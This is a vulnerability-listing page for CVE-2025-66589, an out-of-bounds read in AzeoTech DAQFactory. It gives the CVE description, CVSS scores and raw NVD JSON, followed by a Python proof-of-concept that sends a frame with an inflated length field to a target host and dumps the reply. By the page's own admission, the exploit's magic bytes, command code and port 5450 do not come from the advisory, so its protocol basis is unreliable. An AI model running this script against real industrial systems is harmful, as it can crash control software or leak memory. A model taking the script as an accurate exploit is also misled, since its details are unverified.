Security Vulnerability Report
CVE-2025-66589 CVSS 9.1 CRITICAL

CVE-2025-66589

Published: 2025-12-11 21:15:58
Last Modified: 2026-01-02 20:09:20

Description

In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Read vulnerability can be exploited by an attacker to cause the program to read data past the end of an allocated buffer. This could allow an attacker to disclose information or cause a system crash.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:* - VULNERABLE
AzeoTech DAQFactory 20.7 (Build 2555) and earlier versions (the CPE match in the raw record below ends before version 21.1)

PoC / Exploit Code

⚠ For Security Research Only
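The following code is for security research and authorized testing only. The protocol details it relies on (magic bytes, command code, port 5450) do not appear in the advisory data shown on this page, and the record's CVSS 4.0 vector rates the attack vector as local with active user interaction, so the outcome of running it is not a reliable indicator of whether a host is affected.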
python
# CVE-2025-66589 - AzeoTech DAQFactory out-of-bounds read (CWE-125)
# Listed target: AzeoTech DAQFactory 20.7 (Build 2555)
#
# NOTE(review): the frame layout used here (magic bytes, command code,
# length field) and the default port 5450 come from this listing only; the
# CVE record reproduced on the page does not describe a network protocol,
# and its secondary CVSS 4.0 vector is AV:L/UI:A (local, active user
# interaction). Treat "no response" or "connection refused" as inconclusive,
# not as evidence that a host is unaffected. The CPE range in the record
# ends before 21.1, so the version check is the dependable test.
import socket
import struct
import sys


def send_exploit(target_ip, target_port=5450):
    """Send one frame with an inflated length field and print any reply.

    The frame declares a payload length of 0xFFFF but carries only 100
    bytes. A parser that trusts the declared length instead of the number
    of bytes actually received would read past the end of its buffer,
    which is the out-of-bounds read class (CWE-125) named in the CVE
    record. The server-side fix for that class is to bound the declared
    length by the bytes received before reading.

    Args:
        target_ip: Host to connect to.
        target_port: TCP port; 5450 by default (unverified, see the
            review note at the top of the file).

    Returns:
        True once the frame was sent and the socket closed, whether or
        not any data came back; False if any exception was raised.
    """
    # Frame as assumed by this listing: magic + command + length + payload.
    frame = b"".join(
        (
            b'\x44\x41\x51\x46',         # "DAQF" magic header
            struct.pack('<H', 0x0001),   # command: read request
            struct.pack('<I', 0xFFFF),   # declared length, far above the real payload
            b'\x41' * 100,               # the 100 bytes actually sent
        )
    )

    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.settimeout(10)
        conn.connect((target_ip, target_port))

        conn.send(frame)
        print(f"[+] Malicious packet sent to {target_ip}:{target_port}")

        # Any bytes returned are printed as hex; the listing presumes they
        # may include memory beyond the request buffer.
        reply = conn.recv(4096)
        if reply:
            print(f"[+] Received response ({len(reply)} bytes)")
            print(f"[+] Raw data: {reply.hex()}")

        # Closed on the success path only; on an exception the socket is
        # left for the garbage collector.
        conn.close()
    except Exception as e:
        print(f"[-] Error: {e}")
        return False
    return True


if __name__ == "__main__":
    # Usage: <target_ip> [port]; the port falls back to 5450 when omitted.
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)

    target = sys.argv[1]
    port = 5450 if len(sys.argv) <= 2 else int(sys.argv[2])

    print(f"[*] CVE-2025-66589 PoC - DAQFactory OOB Read")
    print(f"[*] Target: {target}:{port}")
    send_exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66589", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:58.073", "lastModified": "2026-01-02T20:09:20.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In AzeoTech DAQFactory release 20.7 (Build 2555), an Out-of-bounds Read vulnerability can be exploited by an attacker to cause the program to read data past the end of an allocated buffer. This could allow an attacker to disclose information or cause a system crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:azeotech:daqfactory:*:*:*:*:*:*:*:*", "versionEndExcluding": "21.1", "matchCriteriaId": "5376DDEC-0BAA-465A-9EFB-62B3600336E8"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-03", "source": "[email protected]", "tags": ["Third Party Advisory", "US Government Resource"]}]}}